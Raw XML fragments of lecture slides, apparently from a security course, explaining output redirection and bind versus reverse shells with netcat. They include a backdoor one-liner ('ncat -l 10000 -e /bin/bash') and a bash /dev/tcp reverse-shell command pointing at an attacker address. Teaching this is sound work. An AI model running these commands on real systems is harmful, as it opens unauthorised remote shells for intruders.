          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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4445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167"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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a hidden communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859"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0554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082" y="1924968"/>
            <a:ext cx="4166329" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>connection occurs., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422740" y="1209879"/>
            <a:ext cx="1684075" cy="21106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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="324536" y="6017257"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3636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95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86082" y="220434"/>
            <a:ext cx="2669320" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim sends signals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2336829" y="451267"/>
            <a:ext cx="418573" cy="39912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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4252411" y="126386"/>
            <a:ext cx="2024732" cy="543867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker listens port 8080 first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264777" y="670253"/>
            <a:ext cx="1238032" cy="1341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3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929677" y="0"/>
            <a:ext cx="5244883" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="879422"/>
            <a:ext cx="3958088" cy="936221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="951356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Extra credits: Another approach for reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094757" y="1396567"/>
            <a:ext cx="7720321" cy="5180741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249336" y="1"/>
            <a:ext cx="3942664" cy="235898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="933" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385115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Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="9934927" cy="4814400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are two places programs send output to: Standard output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and Standard Error (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You can redirect these outputs to a different place (like a file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File descriptors are used to identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (1) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>command &gt; output is just a shortcut for command 1&gt; output;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using 2&gt;&amp;1 will redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to whatever value is set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (and 1&gt;&amp;2 will do the opposite).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="965843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r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>firewall etc. may block the bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4943729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pPr marL="93131" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell - attacker's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>machine acts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server. This is exactly what is done by the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.0.0.1/8080 0&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058254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Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Standard_streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.brianstorti.com/understanding-shell-script-idiom-redirect/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.computerhope.com/unix/nc.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782016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algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5350445" y="1474662"/>
            <a:ext cx="5689840" cy="3647732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6657359" y="2061238"/>
            <a:ext cx="2017514" cy="72801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dirty="0"/>
              <a:t>Keyboard/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6657359" y="3354993"/>
            <a:ext cx="1806872" cy="72801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dirty="0"/>
              <a:t>Display/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
